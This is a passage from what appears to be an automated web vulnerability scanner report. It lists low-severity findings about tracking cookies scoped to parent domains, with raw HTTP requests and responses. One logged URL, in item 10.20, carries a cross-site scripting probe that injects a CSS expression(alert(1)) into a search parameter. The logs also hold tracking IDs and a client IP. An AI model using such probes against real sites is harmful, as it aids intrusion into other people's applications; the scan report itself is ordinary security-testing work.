Set-Cookie: T_drva=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_7f3p=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_5isr=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_9dth=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_dy0g=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_eylv=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_860a=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_37t9=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_6zdh=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_6wqt=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_bg5l=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_3vjx=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_d2vl=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_3rgy=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_8oa1=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_e1hd=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_im3g=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_efdn=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_7dx8=44%3A1nxhp%3A1; Domain=trafficmp.com; Expires=Sun, 02-Sep-2012 21:56:34 GMT; Path=/
Set-Cookie: rth=2-lpay4l-44~1nxhp~1~1-ltn~xc1g~1~1-3rj~jjg5~1~1-f5h~j7wq~1~1-45~bitw~1~1-6ju~a92r~1~1-eww~a872~1~1-3ri~2h5f~1~1-; Domain=trafficmp.com; Expires=Sun, 02-Sep-2012 21:56:34 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

10.17. http://am.trafficmp.com/a/bpix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://am.trafficmp.com
Path:	/a/bpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

T_3dqj=44%3A4528%3A1; Domain=trafficmp.com; Expires=Sun, 02-Sep-2012 21:33:58 GMT; Path=/
rth=2-lqupie-44~4528~1~1-ndp~y5~1~1-exv~0~1~1-; Domain=trafficmp.com; Expires=Sun, 02-Sep-2012 21:33:58 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=41&id=23 HTTP/1.1
Host: am.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=1&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Home&dtmc_product_id=TTN%3A%20Home&dtmc_domain_name=&dtm_items=&dtmc_domain_status=&dtmc_domain_variations=&dtmc_source=WWW000000000W&dtmc_ref=&dtmc_loc=http%3A//www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=4fae74084-d4c4-4986-af20-d7ce71839597-gs1x0mwv; T_k5bs=ndp%3Ay5%3A1; rth=2-lqupie-ndp~y5~1~1-exv~0~1~1-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: image/gif
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Sat, 03 Sep 2011 21:33:57 GMT
Connection: close
Set-Cookie: T_k5bs=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_8t18=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_3dqj=44%3A4528%3A1; Domain=trafficmp.com; Expires=Sun, 02-Sep-2012 21:33:58 GMT; Path=/
Set-Cookie: rth=2-lqupie-44~4528~1~1-ndp~y5~1~1-exv~0~1~1-; Domain=trafficmp.com; Expires=Sun, 02-Sep-2012 21:33:58 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

10.18. http://api.flickr.com/clientaccesspolicy.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.flickr.com
Path:	/clientaccesspolicy.xml

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

localization=en-us%3Bus%3Bus; expires=Sat, 31-Aug-2013 13:08:20 GMT; path=/; domain=.flickr.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clientaccesspolicy.xml HTTP/1.1
Host: api.flickr.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Date: Sat, 03 Sep 2011 13:08:20 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Sat, 31-Aug-2013 13:08:20 GMT; path=/; domain=.flickr.com
Cache-Control: private
X-Served-By: www169.flickr.mud.yahoo.com
Vary: Accept-Encoding
Content-Length: 2211
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Flickr API: Page not found</title>
<link href="http://l.yimg.com/g/css/c_flickr.css.v106445.18" rel="styleshe
...[SNIP]...

10.19. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=9951d9b8-80.67.74.150-1314793633; expires=Mon, 02-Sep-2013 13:12:30 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=6035669&c3=&c4=http%3A%2F%2Fmeetupblog.meetup.com%2F&c5=&c6=&c15=&ns__t=1315055589073&ns_c=UTF-8&c8=The%20Official%20Meetup%20HQ%20Blog&c7=http%3A%2F%2Fmeetupblog.meetup.com%2F&c9=http%3A%2F%2Fwww.meetup.com%2F HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://meetupblog.meetup.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sat, 03 Sep 2011 13:12:30 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Mon, 02-Sep-2013 13:12:30 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

10.20. http://b.scorecardresearch.com/r previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=9951d9b8-80.67.74.150-1314793633; expires=Mon, 02-Sep-2013 12:56:28 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=3000001&d.c=gif&d.o=msnportalbetarmc&d.x=76374269&d.t=page&d.u=http%3A%2F%2Fresearch.microsoft.com%2Fapps%2Fdp%2Fsearch.aspx%3Fq%3D27b6a%2522style%25253d%2522x%2B%25253aexpression%2528alert%25281%2529%2529%2B%2522d048afd9275%26x%3D0%26y%3D0%23p%3D1%26ps%3D36%26so%3D1%26sb%3Dd%26fr%3D%26to%3D%26fd%3D%26td%3D%26rt%3D%26f%3D%26a%3D%26pn%3D27b6a%2522style%25253d%2522x%2B%25253aexpression%2528alert%25281%2529%2529%2B%2522d048afd9275%26pa&d.r=http%3A%2F%2Fresearch.microsoft.com%2Fen-us%2Fdefault.aspx HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://research.microsoft.com/apps/dp/search.aspx?q=27b6a%22style%253d%22x+%253aexpression%28alert%281%29%29+%22d048afd9275&x=0&y=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sat, 03 Sep 2011 12:56:28 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Mon, 02-Sep-2013 12:56:28 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

10.21. http://bh.contextweb.com/bh/set.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bh.contextweb.com
Path:	/bh/set.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

V=PpAVCxNh2PJr; Domain=.contextweb.com; Expires=Tue, 28-Aug-2012 21:33:49 GMT; Path=/
cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%0A749%3B09%2F17%2F2011%3BDOTM5; Domain=.contextweb.com; Expires=Sun, 07-Aug-2016 21:33:49 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.22. http://c7.zedo.com/img/bh.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/img/bh.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

FFAbh=977B305,20|149_1#365:826,20|121_977#365;expires=Fri, 02 Dec 2011 21:40:29 GMT;domain=.zedo.com;path=/;
FFBbh=977B305,20|149_1#0:826,20|121_977#0;expires=Sun, 02 Sep 2012 21:40:29 GMT;domain=.zedo.com;path=/;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/bh.gif?n=305&g=20&a=149&s=1&t=r HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=4&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Domain&dtmc_product_id=TTN%3A%20Domains%3A%20Search%3A%20Taken&dtmc_domain_name=xss.com&dtm_items=&dtmc_domain_status=TAKEN&dtmc_domain_variations=xss.la&dtmc_source=WWW000000000W&dtmc_ref=http%3A//www.register.com/&dtmc_loc=http%3A//www.register.com/domain/searchresults.rcmx%3Fwebmetrics%3Dnull%26searchOrigin%3Dhomepage%26domain%3Dxss%26selectedTLDs%3D.com%26x%3D0%26y%3D0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 47
Content-Type: image/gif
Set-Cookie: FFAbh=977B305,20|149_1#365:826,20|121_977#365;expires=Fri, 02 Dec 2011 21:40:29 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFBbh=977B305,20|149_1#0:826,20|121_977#0;expires=Sun, 02 Sep 2012 21:40:29 GMT;domain=.zedo.com;path=/;
ETag: "91967049-de5c-4a8e112997f00"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=29883
Expires: Sun, 04 Sep 2011 05:58:32 GMT
Date: Sat, 03 Sep 2011 21:40:29 GMT
Connection: close

GIF89a.............!.......,...........D..;

10.23. https://cart.godaddy.com/basket.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cart.godaddy.com
Path:	/basket.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

currency1=potableSourceStr=USD311ef78c60812ba60cb9d86e; domain=godaddy.com; expires=Mon, 03-Sep-2012 21:48:28 GMT; path=/
flag1=cflag=us; domain=godaddy.com; expires=Mon, 03-Sep-2012 21:48:28 GMT; path=/
traffic=cookies=1&referrer=http://www.godaddy.com/gdshop/offers/cross_sell.asp?ci=42031&config=ssldefault&sitename=cart.godaddy.com&page=/basket.aspx&server=M1PWCARTWEB009&status=200 OK&querystring=app_hdr=&piishown=0&shopper=46215871&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=19a7e39c-dcff-40f6-8f6d-e19d0c50259d&split=24&referringdomain=; domain=godaddy.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /basket.aspx?app%5Fhdr= HTTP/1.1
Host: cart.godaddy.com
Connection: keep-alive
Referer: http://www.godaddy.com/gdshop/offers/cross_sell.asp?ci=42031&config=ssldefault
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; BlueLithium_ssl=dbdflblbdeidccshddredcccjfvazaii; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40; adc1=US; currency1=potableSourceStr=USD; ShopperId1=yjjjodldcfygaahhseaipjhbleigjbpa; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMinorVer=3&fMajorVer=10&slMajorVer=-1&slMinorVer=-1; pagecount=2; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; traffic=; domainYardVal=%2D1; serverVersion=A

Response

10.24. http://cf.addthis.com/red/p.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cf.addthis.com
Path:	/red/p.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

di=1314983342.10R|1314983342.1FE|1314983342.1OD|1314983342.60|1314983342.1EY; Domain=.addthis.com; Expires=Mon, 02-Sep-2013 17:32:22 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/p.json?rb=2&gen=1000&gen=100&sid=4e6264ca66bc96d7&callback=_ate.ad.hrr&pub=xa-4c99effd765dd67e&uid=4e5e3f1ae3fd7427&url=http%3A%2F%2Fvasco.com%2Fcompany%2Fpress_room%2Fnews_archive%2F2011%2Fnews_diginotar_reports_security_incident.aspx&ref=http%3A%2F%2Fvasco.com%2F&1lovjpa HTTP/1.1
Host: cf.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh52.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; di=%7B%7D..1314983342.10R|1314983342.1FE|1314983342.1OD|1314983342.60|1314983342.1EY; psc=4; uid=4e5e3f1ae3fd7427; uvc=17|35; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Sat, 03 Sep 2011 17:32:22 GMT
Set-Cookie: di=1314983342.10R|1314983342.1FE|1314983342.1OD|1314983342.60|1314983342.1EY; Domain=.addthis.com; Expires=Mon, 02-Sep-2013 17:32:22 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Mon, 03-Oct-2011 17:32:22 GMT; Path=/
Content-Type: text/javascript
Content-Length: 88
Date: Sat, 03 Sep 2011 17:32:21 GMT
Connection: close

_ate.ad.hrr({"urls":[],"segments":[],"loc":"OTUxMDFOQVVTQ0EyMTczMDU4MDgwNzc0MDAwVg=="});

10.25. http://cf.addthis.com/red/usync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cf.addthis.com
Path:	/red/usync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

di=%7B%226%22%3A%226422714091563403120%22%7D..1315071277.1WV|1315071141.10R|1315071141.1FE|1315071141.60|1315071141.1EY|1314983342.1OD; Domain=.addthis.com; Expires=Mon, 02-Sep-2013 17:34:55 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/usync?pid=6&puid=6422714091563403120 HTTP/1.1
Host: cf.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh52.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uit=1; uid=4e5e3f1ae3fd7427; uvc=22|35; psc=0; dt=X; di=%7B%7D..1315071141.10R|1315071225.1WV|1315071141.1FE|1314983342.1OD|1315071141.60|1315071141.1EY

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: di=%7B%226%22%3A%226422714091563403120%22%7D..1315071277.1WV|1315071141.10R|1315071141.1FE|1315071141.60|1315071141.1EY|1314983342.1OD; Domain=.addthis.com; Expires=Mon, 02-Sep-2013 17:34:55 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Content-Type: image/png
Content-Length: 67
Date: Sat, 03 Sep 2011 17:34:55 GMT
Connection: close

.PNG
.
...IHDR.............:~.U...
IDATx.c`......H..q....IEND.B`.

10.26. http://cspix.media6degrees.com/orbserv/hbpix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cspix.media6degrees.com
Path:	/orbserv/hbpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

orblb=2lqupib012fd10u0100000; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:22 GMT; Path=/
vstcnt=41bb010r063d7x118e10124zbs2150v10024fj9y118e10024t1es127p10124uzg6118e1032455ue118e1022; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:22 GMT; Path=/
clid=2lqt1dm01170vf1kj11kp2en05i0c00d6u02100d908; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:22 GMT; Path=/
sglst=41bb00v00t044m9w00arr9w00dnh9u303td9w00arp9u30f7u9u307219w000kn9w00a6p9w005m39w005m29u305no9u30dsb9w00cnw9w00esh9w00cnu9u30gol9u30esg9u30ctn9u308nc9w00ebb9w00ctp9w00cro9w004qk9u30h9v9u30dzq9u30bow9u304wb9w00dzt9w001bi030ag29w008dy9w000td9w0; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:22 GMT; Path=/
rdrlst=41c0sh6lqupib000000086u021d6blqupib000000086u021byalqtqj10000000b6u02120zlqupib000000086u0213kulqupib000000086u0216pilqwj0f000000046u020x18lqupib000000086u0218k8lqupib000000086u0216pelqtqj10000000b6u0218ldlqwnn2000000036u0218lclqupib000000086u0218erlqtqj10000000b6u02163mlqupib000000086u0218etlqwj0f000000046u0209pglqupib000000086u021679lqupib000000086u020dhvlqupib000000086u020dhxlqwj0f000000046u0218lplqupib000000086u0214kelqtqj10000000b6u0218lqlqwj06000000056u0214khlqwj0f000000046u0214hnlqwj0f000000046u0218l0lqtqsb000000096u020lm0lqupib000000086u020lw4lqwj0f000000046u0217fllqupib000000086u0217gxlqtqj10000000b6u0218kzlqwj02000000066u020lm4lqupib000000086u020llslqupib000000086u020zpelqwj0f000000046u021192lqyjdy000000026u020zpclqtqj10000000b6u0219ezlqtqj10000000b6u0218knlqw8s9000000076u0206pblqupib000000086u0218kmlqtqjn0000000a6u020afolqupib000000086u0207sylqupib000000086u020kkjlqupib000000086u020drhlqupib000000086u0210telqyjdy000000016u0114bxlqwj0f000000046u0214bulqtqj10000000b6u021cyqlqtqj10000000b6u020huxlqtqj10000000b6u0216d5lqwj0f000000046u02; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:22 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4e5e3f1ae3fd7427&curl=http%3a%2f%2fvasco.com%2fcompany%2fpress_room%2fnews_archive%2f2011%2fnews_diginotar_reports_security_incident.aspx HTTP/1.1
Host: cspix.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh52.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lqt1dm0zijasq5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0; acs=016020a0e0f0g0h1lqt1dmxzt137enxzt137enxzt10xzt137enxzt10; orblb=2lqupib012fd10u0100000; vstcnt=41bb010r053d7x118e10124zbs2150v10024fj9y118e10024t1es127p1012455ue118e1022; clid=2lqt1dm01170vf1kj11kp2en03m9g00b6t05100b906; sglst=41bb00v00t044m9v00arr9v00dnh9u303td9v00arp9u30f7u9u307219v000kn9v00a6p9v005m39v005m29u305no9u30dsb9v00cnw9v00esh9v00cnu9u30gol9u30esg9u30ctn9u308nc9v00ebb9v00ctp9v00cro9v004qk9u30h9v9u30dzq9u30bow9u304wb9v00dzt9v000xz0108dy9v0; rdrlst=41a0sh6lqupib000000066t051d6blqupib000000066t051byalqtqj1000000096t05120zlqupib000000066t0513kulqupib000000066t0516pilqwj0f000000026t020x18lqupib000000066t0518k8lqupib000000066t0516pelqtqj1000000096t0518ldlqwnn2000000016t0118lclqupib000000066t0518erlqtqj1000000096t05163mlqupib000000066t0518etlqwj0f000000026t0209pglqupib000000066t051679lqupib000000066t050dhvlqupib000000066t050dhxlqwj0f000000026t0218lplqupib000000066t0514kelqtqj1000000096t0518lqlqwj06000000036t0314khlqwj0f000000026t0214hnlqwj0f000000026t020lw4lqwj0f000000026t0218l0lqtqsb000000076t050lm0lqupib000000066t0517fllqupib000000066t0517gxlqtqj1000000096t0518kzlqwj02000000046t040lm4lqupib000000066t050llslqupib000000066t050zpelqwj0f000000026t020zpclqtqj1000000096t0519ezlqtqj1000000096t0518knlqw8s9000000056t0506pblqupib000000066t0518kmlqtqjn000000086t050afolqupib000000066t0507sylqupib000000066t050kkjlqupib000000066t050drhlqupib000000066t0514bxlqwj0f000000026t0214bulqtqj1000000096t051cyqlqtqj1000000096t050huxlqtqj1000000096t0516d5lqwj0f000000026t02

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: orblb=2lqupib012fd10u0100000; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:22 GMT; Path=/
Set-Cookie: vstcnt=41bb010r063d7x118e10124zbs2150v10024fj9y118e10024t1es127p10124uzg6118e1032455ue118e1022; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:22 GMT; Path=/
Set-Cookie: clid=2lqt1dm01170vf1kj11kp2en05i0c00d6u02100d908; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:22 GMT; Path=/
Set-Cookie: sglst=41bb00v00t044m9w00arr9w00dnh9u303td9w00arp9u30f7u9u307219w000kn9w00a6p9w005m39w005m29u305no9u30dsb9w00cnw9w00esh9w00cnu9u30gol9u30esg9u30ctn9u308nc9w00ebb9w00ctp9w00cro9w004qk9u30h9v9u30dzq9u30bow9u304wb9w00dzt9w001bi030ag29w008dy9w000td9w0; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:22 GMT; Path=/
Set-Cookie: rdrlst=41c0sh6lqupib000000086u021d6blqupib000000086u021byalqtqj10000000b6u02120zlqupib000000086u0213kulqupib000000086u0216pilqwj0f000000046u020x18lqupib000000086u0218k8lqupib000000086u0216pelqtqj10000000b6u0218ldlqwnn2000000036u0218lclqupib000000086u0218erlqtqj10000000b6u02163mlqupib000000086u0218etlqwj0f000000046u0209pglqupib000000086u021679lqupib000000086u020dhvlqupib000000086u020dhxlqwj0f000000046u0218lplqupib000000086u0214kelqtqj10000000b6u0218lqlqwj06000000056u0214khlqwj0f000000046u0214hnlqwj0f000000046u0218l0lqtqsb000000096u020lm0lqupib000000086u020lw4lqwj0f000000046u0217fllqupib000000086u0217gxlqtqj10000000b6u0218kzlqwj02000000066u020lm4lqupib000000086u020llslqupib000000086u020zpelqwj0f000000046u021192lqyjdy000000026u020zpclqtqj10000000b6u0219ezlqtqj10000000b6u0218knlqw8s9000000076u0206pblqupib000000086u0218kmlqtqjn0000000a6u020afolqupib000000086u0207sylqupib000000086u020kkjlqupib000000086u020drhlqupib000000086u0210telqyjdy000000016u0114bxlqwj0f000000046u0214bulqtqj10000000b6u021cyqlqtqj10000000b6u020huxlqtqj10000000b6u0216d5lqwj0f000000046u02; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:22 GMT; Path=/
Location: http://cm.g.doubleclick.net/pixel?nid=media6degrees
Content-Length: 0
Date: Sat, 03 Sep 2011 17:32:22 GMT
Connection: close

10.27. http://d7.zedo.com/img/bh.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/img/bh.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ZFFAbh=977B826,20|121_977#365;expires=Fri, 02 Dec 2011 21:40:25 GMT;domain=.zedo.com;path=/;
ZFFBbh=977B826,20|121_977#0;expires=Sun, 02 Sep 2012 21:40:25 GMT;domain=.zedo.com;path=/;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/bh.gif?n=826&g=20&a=121&s=$t&l=1&t=i&e=1 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
